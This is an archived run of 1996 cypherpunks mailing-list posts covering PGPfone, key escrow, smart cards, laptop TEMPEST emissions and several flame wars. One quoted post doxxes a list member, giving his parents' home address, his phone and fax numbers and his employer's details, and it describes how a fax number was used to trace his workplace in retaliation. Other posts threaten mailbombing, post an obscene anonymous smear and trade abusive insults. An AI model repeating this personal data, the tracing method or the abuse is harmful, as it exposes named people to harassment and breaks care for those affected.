technical discussion and turned to baiting Don with ad hominem attacks,
calling him "master of bullshit", and putting "(spit)" after his name. Don
reacted to Paul's provocation exactly once and rather mildly - calling Paul
"fatbrain" in reference to his e-mail host. That was the last we heard from
Don. Has the content-based censor John Gilmore pulled Don's plug as
punishment for "inappropriate content"? Inquiring minds want to know.

For the logorrhetics' reading pleasure, I reproduce another quote from Paul:

]From: paul@fatmans.demon.co.uk
]To: "Dr.Dimitri Vulis KOTM" <dlv@bwalk.dm.com>
]Date: Wed, 18 Sep 1996 15:18:16 +0000
]Subject: Re: Workers Paradise. /Political rant.
]Message-Id: <843149202.18173.0@fatmans.demon.co.uk>
]
]> Yeah!!! And I'll bounce each mailbomb to everyone who tries it. Won't
]> that be fun.  Too ba your netcom account won't last long.
]
]`Fraid not loser, I`ll just mailbomb your ass so bad you won`t know
]what hit you, and my account is on demon, who can handle my incoming
]mail (about 300 a day) without a problem, go ahead punk, make my
]day..
<sig>

(Paul tried mailbombing me and was warned that his mailbombs will be bounced
back to him.)

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Ray <jmr@shopmiami.com>
Date: Wed, 4 Dec 1996 19:57:07 -0800 (PST)
To: jmr@shopmiami.com
Subject: PGPfone list
Message-ID: <199612050356.WAA58944@osceola.gate.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Mime-Version: 1.0
Content-Type: text/plain
Content-Transfer-Encoding: 7bit

To: jmr@shopmiami.com
Date: Thu Dec 05 22:54:33 1996

[My apologies for cross-posting this, but it's important IMO.]

The list owners have given me permission to post an announcement of a list 
for those of us who wish to play with the new PGP-fone software. This is a 
list solely for the discussion of PGP-fone. It is to be low volume and on 
topic, with none of the garbage that the cypherpunks are presently enduring 
(my killfile filter gets enough of a daily workout as it is). Usual rules 
apply on the posting of private mail without the other author's consent, 
polite discussion, etc. Violators of these policies will likely be *truly* 
"censored," (booted off the list, *and* unable to post).

To subscribe to the list, use the web based gateway at:

http://www.rivertown.net/cgi-bin/lwgate

[To prevent abuse, your subscription will be verified.]

PGPfone for Macintosh and Windows 95/NT can be obtained at these locations:

US/Canada users [like PGP, PGPfone falls under ITAR export restrictions.]:

http://web.mit.edu/network/pgpfone

International users:

http://www.ifi.uio.no/pgp/PGPfone.shtml

Current versions are:
Macintosh - version 1.0b7
Windows 95/NT - version 1.0b2

These versions DON'T talk to previous versions. Presently, the PGPfone 
Owner's manual is a MAC file and unfortunately it won't open in the Windows 
environment. Those of us who are MAC-impaired can use the on-line manual 
available at:

http://www.pgp.com/products/fone_01.cgi

There is also a "PGP Fone Registry" at the Rivertown.net PGP-users site 
(which is quite extensive and worth a look for other crypto-related stuff). 
At this site, people willing to test PGP Fone with others can leave their 
names and e-mail addresses, along with their area code and local telephone 
exchange (first three digits) which indicates willingness to be contacted 
via e-mail to possibly set up a time and place to use PGP Fone with each 
other. It's very basic right now. You can access it at:

http://pgp.rivertown.net/pgp-fone

and follow the instructions to sign up. The biggest problem folks have had 
with PGP Fone is finding someone else to use it with. This site can help 
alleviate this. Rivertown.net also has a fine PGPfone icon by Mike Acklin.

P.S. I concur with Peter Trei on the Forbes ASAP big issue. Try to find a 
Forbes subscriber and read it all. He left out one author, cypherpunk Bill 
Frezza. I liked Bill's article best of all.

IMO, Buckley and Paglia unwittingly proved in their ASAP articles that it's 
much easier to fashionably label yourself a "libertarian" than it is to 
actually *be* one.
JMR


Regards, Jim Ray
DNRC Minister of Encryption Advocacy

One of the "legitimate concerns of law enforcement" seems to be
that I was born innocent until proven guilty and not the other
way around. -- me

Please note new 2000bit PGPkey & address <jmr@shopmiami.com>
PGP id.A7D63DA9 98 1F 39 BA 93 86 B4 F5  57 52 64 0E DA BA 2C 71


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEPAwUBMqeZATUhsGSn1j2pAQFFOQfQzF0pGgGKt9/VR44TzGxAq9yk7dUs0JPK
4G9TIRePcnZ+IYqBFiqGaCws9EGrK/1ztv7ryl0FstROmldTxFj197lSsEysPMQb
M8DUbKsDbsLYlNJNCFJkYz9tihM5w5h1YNj4jPwjec3Js/Bh4T3ab6d+h4Ax1ku0
wsWlVv0keP2yXhcFFHPRkkyXmPtTL31/zkGKkwU9dY/efYSf4GeIApfvnYXzInFD
vraFSVd0Qi+8py86RZBauKO/vt7mj9r32HCZevPE89AUDVgVnb9Y5SeT9J0f2pXT
qHrpDEguBofvsU/q436Vgla+wrHme2rNYqEPqDslSkNzgg==
=FH37
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Wed, 4 Dec 1996 20:20:57 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Politeness
In-Reply-To: <Pine.BSF.3.91.961204184017.5363G-100000@blacklodge.c2.net>
Message-ID: <Ju4FyD79w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


logos <logos@c2.net> writes:

> Dimitri Vulis wrote:
>
> >logos <logos@c2.net> writes:
> >>      I have been unfailingly polite to you. Do you have it
> >> within your character to respond to me in kind?
>
> >Do you think spelling my last name "Vilus" is polite?
>
>      I think it was neither polite nor impolite. It was
> a innocent transposition error.

"The lady doth protest too much."

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dale Thorn <dthorn@gte.net>
Date: Wed, 4 Dec 1996 23:19:56 -0800 (PST)
To: logos <logos@c2.net>
Subject: Re: Logos -vs- Vulis
In-Reply-To: <Pine.BSF.3.91.961204221926.13090D-100000@blacklodge.c2.net>
Message-ID: <32A67717.1E5D@gte.net>
MIME-Version: 1.0
Content-Type: text/plain


logos wrote:
> Dale Thorn wrote:
> > Dimitri Vulis wrote:
> > > Lame losers who call themselves "cypher punks" and bend
> > > over for John Gilmore.

> > It is obvious that you, Dimitri Vulis, intend to be
> > disruptive to the operation of this list. I have politely
> > asked you several specific questions about your motives.

> Sorry for the noise, but could Logos be specific as to the fallacy in
> each item he/she is addressing?  I thought that was the purpose of
> the Logos character.

> I indicated in my original post that I would be addressing both logic
> and decorum.[snip]
> It was never my intent to nit pick about every bit of sloppy reasoning
> by every poster to Cypherpunks.  Rather, I am trying to elevate the
> general level of discourse via selective commentary and (hopefully) by
> example.  If Dale Thorn, or anyone else, feels that a more rigourous
> attention to logic and/or decorum is called for, I heartily welcome
> your participation.

I understand that you don't want to nit-pick *every* bit of every post,
however, once you do decide to pick on somebody, surely you could point
to the specific fallacies, rather than wring your hands and gnash your
teeth as you did in the long note to the Great Expelled One.

Don't think I don't know what's going on here. I got permanently expelled
from two schools as a youth, to name just two examples from my illustrious
career, yet after learning how to play the game, I probably am doing much
better than most of the drones who completed their studies and kept their
mouths shut.  My life is continually interesting, and I wouldn't think of
trading it for the neurotic, control-freak-mentality lifestyle certain
folks around here "enjoy".

I'm sure (if you know crypto topics) you realize that in creating a crypto
solution, there's no substitute for rigorous attention to detail.  I'm not
opposed to paying some attention to decorum, but logic comes first,
otherwise, you won't have a leg to stand on.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Blake Coverett <blake@bcdev.com>
Date: Wed, 4 Dec 1996 20:23:43 -0800 (PST)
To: "'Igor Chudov'" <ichudov@algebra.com>
Subject: RE: Microsoft & Key Escrow
Message-ID: <01BBE23A.1EB130D0@bcdev.com>
MIME-Version: 1.0
Content-Type: text/plain


Igor wrote:
> this is unfortunate -- key escrow is a very good thing as long
> as it is not mandated by law.
> 
> any reasonable employer concerned about secrecy and recoverability
> of his data should use key escrow solutions for their employees' 
> encryption.

It appears you only read the first question and answer.  Go back and read
the third one.

regards,
-Blake





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ares GodOfWar <ares@imaginet-us.net>
Date: Wed, 4 Dec 1996 20:54:15 -0800 (PST)
To: "'cypherpunks@toad.com>
Subject: PGP 5.0??
In-Reply-To: <c=CA%a=_%p=NorTel_Secure_Ne%l=GRANNY-961205002900Z-1947@bwdldb.ott.bnr.ca>
Message-ID: <32A654A4.D8D@imaginet-us.net>
MIME-Version: 1.0
Content-Type: text/plain


lo all

i am in a terrible mess...
can someone inform me as to the location of PGP 5.0 shareware??
i need it asap ;]

thanx




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: blanc <blancw@cnw.com>
Date: Wed, 4 Dec 1996 23:51:30 -0800 (PST)
To: "'cypherpunks@toad.com>
Subject: RE: Counterproductive Dorothy Denning Flames
Message-ID: <01BBE23E.19BA2560@king1-01.cnw.com>
MIME-Version: 1.0
Content-Type: text/plain


From:	Sir Galahad

I agree.  I hope that my own statements have influence in spite of
my mouldy reputation.
...........................................


Well, on the net nobody knows if you're mouldy, but only if your ideas are 
fresh.  :>)

You've presented some quite insightful explanations for why Ms. Denning's 
prestigious image would give one pause to consider her with reprehension, 
if not outright contempt.  As they say, YMMV, depending on how educated you 
are on the subject of encryption, privacy, and crimes against humanity. 

   ..
Blanc






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Timothy C. May" <tcmay@got.net>
Date: Wed, 4 Dec 1996 23:49:43 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Intellectual dishonesty
In-Reply-To: <Pine.BSF.3.91.961204211709.13090A-100000@blacklodge.c2.net>
Message-ID: <v03007800aecc2f336ad0@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain



Though I have some suspicions that "Logos" is someone I know in Real Life,
I've come to think he's as bad for the list as Vulis, Grubor, and the
others are.

His "superficial decorum" does not hide a deeper viciousness and cluelessness.

At 10:12 PM -0800 12/4/96, logos wrote:
>Dimitri Vulis wrote:
...
>> It's funny that you should say this, since Tim May and other prominent
>> "cypher punks" devote so much attention to their "enemies'" ethnicity and
>> religion. Recall the attacks on "crazy Russians", "immigrants who abuse
>> American freedoms", the recent attack on Hispanics, the attacks on Jews,
>> the attacks on Mormons...
>
>     Yes I do recall some of those statements.  Since you
>feel that those 'attacks' were inappropriate, is it not
>intellectually dishonest to engage in such 'attacks'
>yourself?  If it was wrong for them, how can it be right
>for you?

Fatuous nonsense. The "attacks" Vulis refers to were satirical. This has
been lost in the Noise of the Big Lie.

Logos is now the 17th resident of my Eudora filter file.

--Tim May

P.S. I certainly hope this "Logos" nym is not who I suspect it is, as this
will surely end our Real World friendship. A fucking bozo.


Just say "No" to "Big Brother Inside"
We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1398269     | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Enzo Michelangeli <enzo@ima.com>
Date: Wed, 4 Dec 1996 07:59:52 -0800 (PST)
To: pclow <pclow@extol.com.my>
Subject: RE: The Good dr. Dobbs
In-Reply-To: <96Dec5.012029gmt+0800.21892@portal.extol.com.my>
Message-ID: <Pine.WNT.3.94.961204233405.-830689A-100000@enzohome.ima.com>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 5 Dec 1996, pclow wrote:

> Sorry Dr Boz, but all I saw on the page was this :
> 
> "404 Not Found
> 
> The requested URL /whitepaper.htm was not found on this server. "
> 
> 
> 
> I  would like to point out that our white paper with technical details
> can be found on our Web-site:    www.dsnt.com/whitepaper.htm
> 
> -- 
> Dr. Eva Bozoki
> Chief Scientist
> DSN Technology, Inc.
> (516)467-0400

Almost, but not quite: you forgot a trailing "l".

           http://www.dsnt.com/whitepaper.html

Anyway, 512 bit for a permanent public key doesn't sound that safe. And
this phrase:

  Encrypting the Diffie-Hellman exchange and changing the dynamic common
  key every 24 hours foils "man-in-the-middle" attacks because each
  renegotiation authenticates the two boxes to each other.

sounds especially obscure to me. If the initial exchange of the "permanent
common private key" through a non-authenticated D-H key exchange was
compromised (as it is entirely possible) by a man-in-the-middle attack,
also the subsequent D-H key exchanges encrypted with that supposedly
common key will be subject to the same attack: actually there will be TWO
non-common private keys, and the man in the middle will know both of them. 

Enzo






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ichudov@algebra.com (Igor Chudov @ home)
Date: Wed, 4 Dec 1996 22:21:57 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: The House Rules At The Permanent Virtual Cypherpunks Party
In-Reply-To: <2D3FyD78w165w@bwalk.dm.com>
Message-ID: <199612050559.XAA19657@manifold.algebra.com>
MIME-Version: 1.0
Content-Type: text


Dr.Dimitri Vulis KOTM wrote:
> 
> "Cypher punks" have degenerated into an inbred cybermob whose goal in life
> is to "enforce" the "rules" that apply to "newbies" (more Cabal-speak) but
> not to the "in-crowd".
> 
> Paul Bradley, the vitriolic flamer, is a good example of a "cypher punk".
> Paul doesn't know much about cryptography, but he's been harrassing Don Wood
> because Don Wood dared propose a cryprosystem. I haven't examined Don's
> proposal and don't know how good it is. Paul apparently FTP's Don's files
> but lacked the technical knowledge to understand the proposal. Paul first

Why don't you look at it. I am interested in your comments regarding
possible attacks on Don Wood's system.

	- Igor.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Wed, 4 Dec 1996 21:30:37 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Politeness
In-Reply-To: <Pine.LNX.3.94.961205050651.1234B-100000@random.sp.org>
Message-ID: <4X7FyD2w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


The Deviant <deviant@pooh-corner.com> writes:

> On Wed, 4 Dec 1996, logos wrote:
>
> > Dimitri Vulis wrote:
> >
> > >logos <logos@c2.net> writes:
...
> >      I have already raised the question of your apparent
> > lack of intellectual honesty in that you seem to not apply
> > the same rules of conduct on yourself as you would on
> > others. In English there is the saying, 'what is sauce for
> > the goose, is sauce for the gander'. I note that you have
> > spelt my name as 'logos'. As it is a proper noun in the
> > usage and I have spelt it with the 'L', I would ask you if
> > you consider this spelling of my name to be polite?
> >
> > Logos out
>
> While I neither agree nor disagree with either of your positions, I must
> point out that "Logos" did indeed spell his name as "logos" in his own
> message header.

He he he what is sauce for the goose is sauce for the gander blah blah
blah intellectual dishonesty blah blah blah typical logorrhetic "cypher
punk" can't spell his own nym politely.

Thanks, Deviant.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: um@c2.net (Ulf =?ISO-8859-1?Q?M=F6ller?=)
Date: Wed, 4 Dec 1996 17:34:07 -0800 (PST)
To: pgut001@cs.auckland.ac.nz
Subject: Re: Strong-crypto smart cards in Singapore and Germany
In-Reply-To: <199612040350.WAA08153@beast.brainlink.com>
Message-ID: <m0vVRHN-0003bkC@ulf.mali.sub.org>
MIME-Version: 1.0
Content-Type: text/plain


Peter Gutmann writes:

>The standardisation committee of the German banks have also produced
>an electronic wallet which should have 25 million (yes, 25M) users by
>January of next year.  Again, this is a pure electronic wallet, with
>2-key triple DES and 768-bit (to become 1024-bit) RSA encryption.
>[...] This looks like a very nice system, and unlike Mondex doesn't
>rely entirely on the hope that criminals can't get at the data on the
>card.

For 'security reasons', all transactions are logged in what is called
'shadow accounts'. Not what I would call a very nice system.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: stewarts@ix.netcom.com
Date: Thu, 5 Dec 1996 01:47:02 -0800 (PST)
To: cypherpunks@toad.com
Subject: Laptops and TEMPEST
Message-ID: <1.5.4.32.19961205094443.003ac018@popd.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


>Not to mention the point that an external attacker--say, the NSA van parked
>across the street--will under no circumstances be able to measure "the"
>spectrum: his antennas cannot possibly measure the signals (at the lower
>bits) seen by the FM receiver, noise source local to the computer, whatever.

Tim was talking about the Bad Guys setting your radio noise generator,
but the other side of the coin is TEMPEST - making sure your computers
don't emit enough radiation for Bad Guys to read it.  CRTs are well known
as emitters of easily decoded signal, but people have occasionally suggested
on this list that laptop LCD screens are much quieter.  I now have a data
point on this one, and basically, it ain't so.

Take a basic television with big rabbit-ear antennas.
Tune to the football game on Channel 6.
Take your AT&T Globalyst 250P (which is a gray NEC Versa with a Death Star),
with the 16-million-color 640x480 screen in 65536-color mode, 
and pop up a DOS command window in white-on-black.
Type a few lines of text, then look at the TV.

The sync wasn't quite right, but there were about three copies of
my DOS window.  It may have been scrolling slowly vertically or horizontally,
but it was relatively readable given the lack of resolution of the screen.
A good receiver run by a Bad Guy ought to be able to set its scan rates
correctly to pick up the screen at better resolution.
There are obviously more variables to be explored, but other people
who were present at the time considered the football game to be
more important :-)

#			Thanks;  Bill
# Bill Stewart, +1-415-442-2215 stewarts@ix.netcom.com
# You can get PGP outside the US at ftp.ox.ac.uk
#     (If this is posted to cypherpunks, I'm currently lurking from fcpunx,
#     so please Cc: me on replies.  Thanks.)





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: stewarts@ix.netcom.com
Date: Thu, 5 Dec 1996 01:45:22 -0800 (PST)
To: cypherpunks@toad.com
Subject: SAIC buying Bellcore - Spooks have your number.
Message-ID: <1.5.4.32.19961205094500.003b870c@popd.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


The papers have been announcing recently that SAIC is buying 
Bellcore for ~$700M.  SAIC is the spook-connected beltway bandit firm
that recently bought the Network Solutions folks who run the Internet NIC.
Bellcore is the Bell Labs spinoff that the RBOCs have jointly owned since
the breakup of the Bell System a decade ago.  One of the interesting
things that Bellcore does is own and administer the North American
Numbering Plan, which is the telephone numbering space for
Country Code 1, including the US, Canada, and much of the Caribbean.
(Mexico used to have a kluged subset of 1, but a few years ago
decided to join with Latin America instead, gaining 5- prefixes.)

So you want an Internet domain name?  Ask SAIC.
You want a phone number?  Ask SAIC.
It's nothing to get all paranoid about, probably, but it would be
interesting to speculate what they can do with it, besides finding
a post-Cold-War income stream.

I wonder if the Ethernet address space or IPv4 or maybe IPv6 
addresses are their next acquisition?

#			Thanks;  Bill
# Bill Stewart, +1-415-442-2215 stewarts@ix.netcom.com
# You can get PGP outside the US at ftp.ox.ac.uk
#     (If this is posted to cypherpunks, I'm currently lurking from fcpunx,
#     so please Cc: me on replies.  Thanks.)





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: lucifer@dhp.com (Anonymous)
Date: Wed, 4 Dec 1996 23:00:25 -0800 (PST)
To: cypherpunks@toad.com
Subject: [CRYPTO] Forgery detection
Message-ID: <199612050700.CAA10539@dhp.com>
MIME-Version: 1.0
Content-Type: text/plain


Timmy `C' May uses an Adolf Hitler action figure as a dildo.

       >\\\|/<
       |_    ;
       (O) (o)
   -OOO--(_)--OOOo- Timmy `C' May






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Evil se7en <se7en@dis.org>
Date: Thu, 5 Dec 1996 03:50:32 -0800 (PST)
To: DC-Stuff List <dc-stuff@dis.org>
Subject: Travelling With Laptops/PGP
Message-ID: <Pine.BSI.3.91.961205032955.685A-100000@kizmiaz.dis.org>
MIME-Version: 1.0
Content-Type: text/plain




Problem:

I will be spending a couple of months chilling out in Barcelona, Spain.
I will have a local Internet account/dial-up in that city, and will use 
it to telnet into my various US-based accounts. This is how I plan to 
keep in touch with various people while I am gone.

Questions:

1 - Is the importation of two laptops and it's various peripheral devices 
by a US citizen into Spain going to be a problem? I know it is in some 
European countries.

2 - Will having PGP 2.6.2, with 2048-bit keys, or any key length for this 
matter, installed on these two machines, cause a problem?

3 - What about having SSH and ESM installed on the laptops? Will this set 
off red flags as well?

Now, I see a work around if this is a problem, but would like advice on 
this also:

If I generate a temporary PGP key, and distribute it prior to my departure,
and then store it on the US-based server (not a good idea, but it is a 
temporary key, and if it is not a problem in Spain, SSH and ESM would be in 
use) then bouncing out of Spain via telnet into US-based computers to 
process encryption/decryption, key management, etc, any encryption would 
never actually take place on servers outside of the US. 

Would this be a viable workaround? Or should I just say fuck it, and just 
disavow myself of any reason/need for PGP for the duration of my stay? If 
this is gonna be a problem, I'll just forego anything requiring 
encryption while I am in Spain.

I have no interest in smuggling crypto in, or defying international law 
just to use PGP for personal use. If it's not allowed, I simply won't use 
it. But, I MUST be able to bring my laptops into the country. That HAS to 
happen.

My Research: I tried to find these answers myself via conventioanl 
methods, and either there was no information available, or the embassy 
people I spoke to weren't sure. (Go figure!) So now I ask for your 
opinions. 

se7en





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: The Deviant <deviant@pooh-corner.com>
Date: Wed, 4 Dec 1996 20:25:50 -0800 (PST)
To: Ryan Russell/SYBASE <Ryan.Russell@sybase.com>
Subject: Re: [crypto] Avatar Protection?
In-Reply-To: <9612050108.AA07734@notesgw2.sybase.com>
Message-ID: <Pine.LNX.3.94.961205042332.1148A-100000@random.sp.org>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On 4 Dec 1996, Ryan Russell/SYBASE wrote:

> A graphic-designer friend of mine and I were talking
> about VRML avatars, and custom design work, and
> could he offer a service designing them etc...
> 
> His worry is that since everyone in the same virtual
> environment as his customer would see the designer 
> avatar, wouldn't they also be able to easily rip off
> his work?  (or his customer's property, take your pick.)
> 
> I wasn't sure...it seems to me that I read something vaguely
> along these lines for a cryptography protocol of some sort..
> The problem is this:  Is there a way for a user to "view" the client's
> avatar (and in this sense, the user usually has to receive a copy 
> of the code to render the avatar and render it on the local machine)
> but not save a copy?  Assume that a client with no save feature
> is not a viable option...too easy to work around.

Well, its concievable to write your own client, and make the code such
that it only works with that client...  I know, it kindof sucks, doesn't
it?

> 
> I suppose an analogy would be: Is there a way for a person to
> see the plaintext, but not record it?  I think that question really
> answers itself - no.  How about alternatives?  If the server
> of the environment only renders "views" (say, certain angles, or
> a bitmap) of the avatar, rather than sending the description file?
> 
> Any other thoughts?
> 
>     Ryan
> 

 --Deviant
   PGP KeyID = E820F015 Fingerprint = 3D6AAB628E3DFAA9 F7D35736ABC56D39

"First things first -- but not necessarily in that order"
                -- The Doctor, "Doctor Who"


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEVAwUBMqZOczCdEh3oIPAVAQHEAwf+IZ4KzMjcmb8t/HTMBvp83ChZ0VLS6xa3
+OwtpvkVGnuD4AJ+ayvDS10u4oAx78OillYDPolz6Gpnv0L+KDseo0sz7Yhgvepp
HwUw4UqMDBu9BMfkITFs6IS773EIgC8JmIf8/u6xEH/tvUjl44RQlgX+YE1Ybhvq
cGo3dF60fdiYzmoYvYESrMo9ldr97bImSjUE46bd4ZrtHjVTqDB75r9Uhb38SPWD
SdEi6rdC4sX1dY9zdJHIruhIM5BBpZcHX9Vo8cOSvzZY1s7rHXVQgb34rIcUcx7T
2GJTeJsTS2boi9O0urkKW8FIZtq82AnBk5WsavRtEIw0O5pC0jhR2g==
=aWWo
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: aga <aga@dhp.com>
Date: Thu, 5 Dec 1996 01:32:23 -0800 (PST)
To: freedom-knights@jetcafe.org
Subject: Jack D. Hidary & Arsen
In-Reply-To: <7RZFyD77w165w@bwalk.dm.com>
Message-ID: <Pine.LNX.3.95.961205042440.22645F-100000@dhp.com>
MIME-Version: 1.0
Content-Type: text/plain


Does this "Arsen" still work for Jack D. Hidary
and that EarthWeb LLC?

On Wed, 4 Dec 1996, Dr.Dimitri Vulis KOTM wrote:

> > Just ignore them - Vulis is on the rag again.  Someone please buy Vulis a
> > box of anal tampons so he can calm down.
> 
> This reminds me how someone posted an anonymous message to this list calling
> Matt Blaze a "homosexual Jew" and Tim Scanlon (another lying Tim) immediately
> announced that I must be its author. He lied, of course, being a "cypher punk".
> 
> Anyway, seeing that Arsen posted the above obscenities during duty hours, I
> figured I'll post another tutorial on tracking down information on the 'net.
> 
> Arsen vainly insisted on listing his name in InterNIC's database as RA1215
> (unusual for someone supposedly interested in privacy). Arsen listed a phone
> number (+1 718 786 4227) which is apparently at his parents' residence (48-21
> 40th St, Apt 2B, Calvary, NY 11104-4111) and a fax number (+1 212 725 6559).
> 
> The fax number is in Manhattan area code. A good conjecture is that it belongs
> to some sort of business, and that the business's main number ends with a 0.
> 
> Indeed, calling +1 212 725 6550 (Arsen's listed fax number, 9 replaced by a 0)
> and talking to a nice young lady reveals that this phone number belongs to the
> Web designer EarthWeb, LLC; that they're at 3 Park Ave, 38th floor, New York,
> NY 10016; that the partnership's principals are:
> * Jack D. Hidary, president and CEO, <jack@earthweb.com>
> * Murray Hidary, senior vice president for operations, <murray@earthweb.com>
> * Nova Spivack, senior vice president for marketing, <nova@earthweb.com>
> and that Arsen is their associate network administrator.
> 
> That's how much one can learn just from the fax number in one's InterNIC entry.
> 
> For the logorrhetics' reading pleasure, I'll quote some of Arsen's earlier
> writings on the "cypher punks" mailing list:
> 
> ]Actually, unlike you, I do feel sorry for you, for you truly have no life
> ]and have nothing better to do than to start flame wars and such.  Do
> ]yourself a favor, get a real life.  Go get off your fat ass and do
> ]something with yourself other than masturbating.
> ...
> ]You wouldn't know what a life is if one came up to you and bit you on your
> ]ass. Oh tell us oh great one, and what is it that you know?  But spare us
> ]the flames and hate.  We already know that you are an asshole, of that
> ]there is little doubt.  What is at doubt is your degree, or is it a
> ]pedigree?  Shower us with your knowledge if you have any, for it is
> ]apparent that dazzling us with your bullshit isn't working.
> ...
> ]And what by your definition is your level of life if all your output
> ]seems to be nothing more than flames and flame bait?  How much of a loser
> ]are you to resort to anonymous daily warnings about Tim?  Just how off
> ]topic and stupid was your message when you posted it?  Just how many
> ]plates of pork and beans do you eat each day to keep up your innane level
> ]of flatulence?
> ...
> ]Apparently that "Doctorhood" of yours is good only for masturbatory self
> ]congratulations, and when nobody pays attention to it, you turn around and
> ]put others down so that in your oppinion, such as it is, you come out
> ]smelling like roses.  Buddy, I've news for you, you aren't fooling anyone.
> ]You are the total absolute embodyment of shit.  No, before you
> ]congratulate yourself on your achievement of shithood, you aren't even
> ]even human or dog shit, no.  You are the essence of amoeba shit.  The
> ]lowest of the low. You've a long way to go before you will ever achive
> ]the status of high human shit.  But I must admit, you certainly know how
> ]to strive for that goal.  It's too bad you'll never be more than low
> ]grade microscopic shit though.
> ]...
> ]And for that, you have my deepest condolances.  At least I hope this
> ]comforts you in your lack of life, for assuredly you haven't much of one.
> ]At least at a minimum, if you get nothing else from this message, you'll
> ]get a tenth of an ounce of pitty.
> ]...
> ]And maybe someday, if you are really really good you might even achive
> ]rat shitdom.  Then we'll be real proud of you for being rat shit, but
> ]until that time, strive hard and work long hours.  Hey, and when you reach
> ]rat shitdom and become emeritus ratus shitus, we'll throw you a party!
> 
> Aren't the "cypher punks" a polite lot?
> 
> ---
> 
> Dr.Dimitri Vulis KOTM
> Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps
> 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Evil se7en <se7en@dis.org>
Date: Thu, 5 Dec 1996 04:38:01 -0800 (PST)
To: DC-Stuff List <dc-stuff@dis.org>
Subject: Addendum
Message-ID: <Pine.BSI.3.91.961205044054.839F-100000@kizmiaz.dis.org>
MIME-Version: 1.0
Content-Type: text/plain



For those who may bring this up, my questions are in relation to Spain's 
view of my problems, not the US view, as I can bring PGP out of the US 
legally.

In February 1996, the ITAR rules were amended as regards personal use of
cryptography. Temporary export of products for personal use is exempted 
from the need of a license, provided the exporter takes normal precautions 
to ensure the security of the product, including locking the product in 
a hotel room or safe. The product must not be intended for copying, 
demonstratrion, marketing, sale, re-export, or transfer of ownership or 
control. In transit, the product must remain with the exporter's 
accompanying baggage. The exporter must keep records of each export for 
five years. Export to certain "dangerous" countries 
(e.g., Cuba, Libya, Syria) is prohibited. See the text of the amendment.


se7en




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: The Deviant <deviant@pooh-corner.com>
Date: Wed, 4 Dec 1996 21:10:43 -0800 (PST)
To: logos <logos@c2.net>
Subject: Re: Politeness
In-Reply-To: <Pine.BSF.3.91.961204184017.5363G-100000@blacklodge.c2.net>
Message-ID: <Pine.LNX.3.94.961205050651.1234B-100000@random.sp.org>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Wed, 4 Dec 1996, logos wrote:

> Dimitri Vulis wrote:
> 
> >logos <logos@c2.net> writes:
> >>      I have been unfailingly polite to you. Do you have it
> >> within your character to respond to me in kind?
> 
> >Do you think spelling my last name "Vilus" is polite?
> 
>      I think it was neither polite nor impolite. It was
> a innocent transposition error.
>      Correcting the error and apologizing were polite,
> however. Do you disagree?  
>      I have already raised the question of your apparent
> lack of intellectual honesty in that you seem to not apply 
> the same rules of conduct on yourself as you would on 
> others. In English there is the saying, 'what is sauce for 
> the goose, is sauce for the gander'. I note that you have 
> spelt my name as 'logos'. As it is a proper noun in the 
> usage and I have spelt it with the 'L', I would ask you if 
> you consider this spelling of my name to be polite?
>  
> Logos out
>

While I neither agree nor disagree with either of your positions, I must
point out that "Logos" did indeed spell his name as "logos" in his own
message header.

 --Deviant
